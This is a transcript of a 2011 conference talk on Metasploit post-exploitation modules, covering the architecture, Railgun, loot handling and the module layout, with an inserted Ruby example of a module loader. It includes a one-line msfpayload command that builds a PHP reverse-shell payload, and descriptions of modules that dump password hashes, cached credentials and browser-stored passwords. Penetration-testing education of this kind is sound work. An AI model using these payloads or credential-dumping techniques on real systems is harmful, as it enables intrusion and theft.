Deep Dive into Red Teaming with the Metasploit Framework

Upload: gopinath6015620

Post on 08-Apr-2018


TRANSCRIPT

  • 8/7/2019 Deep Dive Into Red Teaming With the it Framework

    1/28

    Deep Dive into Red Teaming with the Metasploit Framework

    James "egyp7" Lee, March 22, 2011


    Outline

    Metasploit Framework architecture
    What are Metasploit modules?
    Post-exploitation modules
    Building other types of payloads
    Platform-agnostic payloads
    New Metasploit Express/Pro features
    Live Demo

    This presentation is for advanced Metasploit Framework users!


    Metasploit overview

    Metasploit Project founded in 2003
    Open Source penetration testing platform with over 1 million downloads in the past year
    Acquired by Rapid7 in 2009
    HD Moore joined Rapid7 as Chief Security Officer and Chief Architect of Metasploit
    Rapid7 remains committed to the Community
    Metasploit Framework is the foundation for the commercial editions Metasploit Express and Metasploit Pro


    Metasploit Framework architecture

    LIBRARIES: Rex, MSF Core, MSF Base
    MODULES: Payload, Encoder, NOP, Auxiliary, Exploit
    INTERFACES: Console, CLI, RPC, GUI & Armitage
    PLUGINS
    TOOLS



    What are Metasploit modules?

    More than just exploits
    Payloads: the "arbitrary code" you hear about in advisories
    Encoders: add entropy to payloads, remove bad characters
    NOP: create sophisticated nopsleds
    Auxiliary: like an exploit module but without a payload; underappreciated


    Metasploit Framework architecture, now with Post modules

    LIBRARIES: Rex, MSF Core, MSF Base
    MODULES: Payload, Encoder, NOP, Auxiliary, Exploit, Post
    INTERFACES: Console, CLI, RPC, GUI & Armitage
    PLUGINS
    TOOLS


    Back in the day

    Best post-exploitation option was irb
    Still staggeringly useful but hard to automate
    Enter: Meterpreter scripts


    Meterpreter scripts

    Good
    Re-read before every run: easier development
    Simple interface
    Anything Ruby can do
    Access to the framework and the session

    Not so good
    No structure
    No meta data
    No generic compatibility checks
    Ad-hoc options
    Only work on Meterpreter
    Not easy to reuse code


    New hotness: post-exploitation modules

    Newest and least-explored module type
    Great place to start contributing to the framework
    Intended to replace Meterpreter scripts
    Should retain good aspects
    Improve the not-so-good aspects


    Keeping the good

    Always reloaded when run from meterpreter>
    Can use reload and rerun commands in msf>
    Simple interface
    Anything Ruby can do
    Access to the Framework and the session: actually easier than scripts


    Improving the not-so-good

    Structured like other module types: improves consistency
    Includes metadata like author, description, etc.
    Option setting consistent with other modules: set VAR value
    Mixins for some common tasks, more on the way: file system manipulation, registry twiddling, running commands


    Using post-exploitation modules

    Like exploits, can be Active or Passive
    Like aux, add run command; exploit is an alias
    Take a session option
    Define what kinds of sessions are compatible: Meterpreter, shell
    Different platforms


    Three ways to run them

    Directly from meterpreter> with the run command:
        run post/windows/gather/resolve_sid SID=S-1-5-1

    Via the normal module interface:
        use post/windows/gather/resolve_sid
        set SID S-1-5-1
        run

    As an AutoRunScript:
        use exploit/some/module
        set AutoRunScript post/windows/gather/resolve_sid SID=S-1-5-1
        exploit


    Railgun

    Not new exactly, but undergoing some major improvements
    Arbitrary Ruby -> remote Windows API bridge
    Call any function in any DLL on the system
    Use an application's own API against it (Chrome/Firefox stored passwords)
    Many potential uses here


    Loot

    Pilfered data
    Can be anything, stored in a file: process listing, environment variables
    Usually not passwords (use the Creds table for that)


    Awesome Post Modules

    Hashdump
    Similar in function to the hashdump command
    Instead of injecting into lsass, just reads the registry
    Calculates everything necessary to pull hashes directly out of SAM
    There's an OS X version now! Reads /var/db/shadow/hash/
    Grabs SHA1, NT, and LM hashes


    Third-party post-exploitation modules

    Cachedump from Maurizio Agazzini
    Like hashdump, but grabs cached credentials
    mscash format for easy cracking (can't be used with pass-the-hash)
    Gets credentials from terminal services/RDP users
    Will eventually be merged into trunk but serves as an example of adding your own stuff


    Modules in the works

    Something for going from shell -> Meterpreter
    And from Java/PHP -> native Meterpreter
    Local exploits! Already have modules for four Windows privilege escalations
    And a generic service auditor
    Also planning to implement Linux local exploits for shell sessions
    Porting scripts to the module format


    Where to put it

    Official modules live in msf3/modules/
    Subdirectories organized by module type (exploit/, auxiliary/, post/, ...)
    ~/.msf3/modules/ has the same structure, loaded at startup if it exists
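To make the directory convention on this slide concrete, here is an added Ruby illustration (not Metasploit's loader) of how a path under a modules root maps to a module reference name, and how a second root such as ~/.msf3/modules/ is merged with the official tree at startup. The function names, the choice that the user tree takes precedence over a same-named official module, the `MODULE_TYPES` list and the temporary-directory fixture are all assumptions of the example; the fixture file names are constructed, and the placeholder files contain no module code.

```ruby
# Added illustration, not Metasploit's own loader: maps the on-disk layout
# (root/<type>/<path>.rb) to reference names like post/windows/gather/resolve_sid
# and merges several roots in order. Names and fixture are example assumptions.
require 'tmpdir'
require 'fileutils'

MODULE_TYPES = %w[exploit auxiliary post payload encoder nop].freeze

# Relative path under a modules root -> [type, refname], or nil when the file
# is not inside a recognised type directory (stray files are ignored, not loaded).
def refname_for(relative_path)
  return nil unless relative_path.end_with?('.rb')
  type, *rest = relative_path.delete_suffix('.rb').split('/')
  return nil unless MODULE_TYPES.include?(type) && !rest.empty?
  [type, ([type] + rest).join('/')]
end

# Walk each root in order; a later root (the per-user tree) adds new modules
# and, in this example, shadows a same-named module from an earlier root.
# Roots that do not exist are skipped, matching "loaded at startup if it exists".
def load_module_tree(roots)
  roots.each_with_object({}) do |root, table|
    next unless File.directory?(root)
    Dir.glob('**/*.rb', base: root).sort.each do |rel|
      entry = refname_for(rel)
      next if entry.nil?
      type, refname = entry
      table[refname] = { type: type, path: File.join(root, rel) }
    end
  end
end

# Constructed fixture standing in for msf3/modules/ and ~/.msf3/modules/;
# every file is a one-line placeholder, not a real module.
def with_sample_trees
  Dir.mktmpdir do |base|
    official = File.join(base, 'msf3', 'modules')
    user = File.join(base, 'home', '.msf3', 'modules')
    {
      official => %w[post/windows/gather/resolve_sid.rb auxiliary/scanner/example.rb README.txt],
      user => %w[post/windows/gather/resolve_sid.rb post/windows/gather/cachedump.rb notes/todo.rb]
    }.each do |root, files|
      files.each do |f|
        FileUtils.mkdir_p(File.dirname(File.join(root, f)))
        File.write(File.join(root, f), "# constructed placeholder for #{f}\n")
      end
    end
    yield official, user
  end
end

if __FILE__ == $PROGRAM_NAME
  with_sample_trees do |official, user|
    load_module_tree([official, user]).sort.each do |refname, meta|
      puts "#{meta[:type].ljust(9)} #{refname}  <- #{meta[:path]}"
    end
  end
end
```

Running it lists three modules: the official scanner, the third-party cachedump picked up only from the user tree, and resolve_sid resolved to the user-tree copy because that root was listed last. The README and the `notes/` file are ignored because they do not sit under a module-type directory.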


    Platform-agnostic payloads


    PHP

    msfpayload php/meterpreter_reverse_tcp LHOST=192.168.99.1 R > foo.php


    Commercial Feature Highlights

    Pro console! All of the above and more is easily accessible in Metasploit Pro Console


    Commercial Feature Highlights

    Post-exploitation modules in Metasploit Pro/Express


    Commercial Feature Highlights

    Host tags are Awesome


    Questions?

    @egyp7

    [email protected]

    James "egyp7" Lee